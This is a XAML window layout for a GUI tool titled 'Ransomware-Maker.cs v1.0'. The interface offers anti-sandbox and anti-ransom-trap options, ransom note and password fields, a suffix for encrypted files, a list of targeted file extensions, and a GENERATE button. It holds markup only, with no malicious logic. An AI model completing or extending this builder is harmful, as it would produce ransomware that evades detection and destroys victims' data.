MainWindow.xaml

<Window x:Class="Ransomware_Maker.cs.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:Ransomware_Maker.cs"
        mc:Ignorable="d"
        Title="Ransomware-Maker.cs v1.0" Height="383" Width="733">
    <Grid HorizontalAlignment="Center" Margin="0,10,0,0" Width="713" RenderTransformOrigin="0.219,0.226" Height="323" VerticalAlignment="Top">
        <GroupBox HorizontalAlignment="Left" Height="195" Header="Setting" Margin="10,0,0,0" VerticalAlignment="Top" Width="225">
            <StackPanel HorizontalAlignment="Left" Height="164" Margin="10,0,0,0" VerticalAlignment="Top" Width="199">
                <CheckBox Content="Reduce program size" Height="20" Width="180" HorizontalAlignment="Left" FontSize="16"/>
                    <CheckBox Content="Anti ransom trap" Height="20" Width="180" FontSize="16" HorizontalAlignment="Left"/>
                    <CheckBox Content="Anti sandbox" Height="26" Width="178" HorizontalAlignment="Left" FontSize="16"/>
                <Label x:Name="lbl_open_source" Content="open source repository" Height="28" Width="193" FontFamily="Consolas" RenderTransformOrigin="0.486,0.993" FontSize="14" Margin="0,66,0,0" MouseDown="lbl_open_source_MouseDown">
                    <Label.Style>
                        <Style TargetType="Label">
                            <Setter Property="Foreground" Value="#FF0A3C00"/>
                            <Setter Property="Cursor" Value="Arrow"/>
                            <Style.Triggers>
                                <Trigger Property="IsMouseOver" Value="True">
                                    <Setter Property="Foreground" Value="Red"/>
                                    <Setter Property="Cursor" Value="Hand"/>
                                </Trigger>
                            </Style.Triggers>
                        </Style>
                    </Label.Style>
                </Label>
            </StackPanel>
        </GroupBox>
        <GroupBox HorizontalAlignment="Left" Height="195" Header="Type" Margin="240,0,0,0" VerticalAlignment="Top" Width="463">
            <Grid HorizontalAlignment="Left" Height="185" Margin="10,0,0,0" VerticalAlignment="Top" Width="434">
                <Grid.RowDefinitions>
                    <RowDefinition Height="86*"/>
                    <RowDefinition Height="8*"/>
                    <RowDefinition Height="61*"/>
                </Grid.RowDefinitions>
                <RadioButton x:Name="rdb_cs" Content="C#" HorizontalAlignment="Left" Height="21" Margin="28,-2,0,0" VerticalAlignment="Top" Width="129"/>
                <RadioButton x:Name="rdb_cpp" Content="C++" HorizontalAlignment="Left" Height="25" Margin="256,0,0,0" VerticalAlignment="Top" Width="110" RenderTransformOrigin="0.782,0.843"/>
                <TextBox x:Name="tbox_warning" HorizontalAlignment="Center" Height="43" Margin="0,19,0,0" TextWrapping="Wrap" Text="warning content" VerticalAlignment="Top" Width="414" FontSize="16"/>
                <TextBox x:Name="tbox_password" HorizontalAlignment="Left" Height="38" Margin="10,64,0,0" TextWrapping="Wrap" Text="passowrd" VerticalAlignment="Top" Width="294" FontSize="16" Grid.RowSpan="3" />
                <TextBox x:Name="tbox_suffix" HorizontalAlignment="Left" Height="38" Margin="304,64,0,0" TextWrapping="Wrap" Text="suffix" VerticalAlignment="Top" Width="115" FontSize="16" Grid.RowSpan="3"/>
                <TextBox x:Name="tbox_suffix_list" HorizontalAlignment="Center" Height="63" Margin="0,9,0,0" TextWrapping="Wrap" Text="&quot;.ppt&quot;,&quot;.html&quot;,&quot;.pptx&quot;" VerticalAlignment="Top" Width="414" FontSize="18" Grid.Row="1" Grid.RowSpan="2"/>
            </Grid>
        </GroupBox>
        <Button x:Name="btn_generate" Content="GENERATE" HorizontalAlignment="Center" Margin="0,200,0,10" Width="693" FontFamily="Arial Black" FontSize="36"/>
    </Grid>
</Window>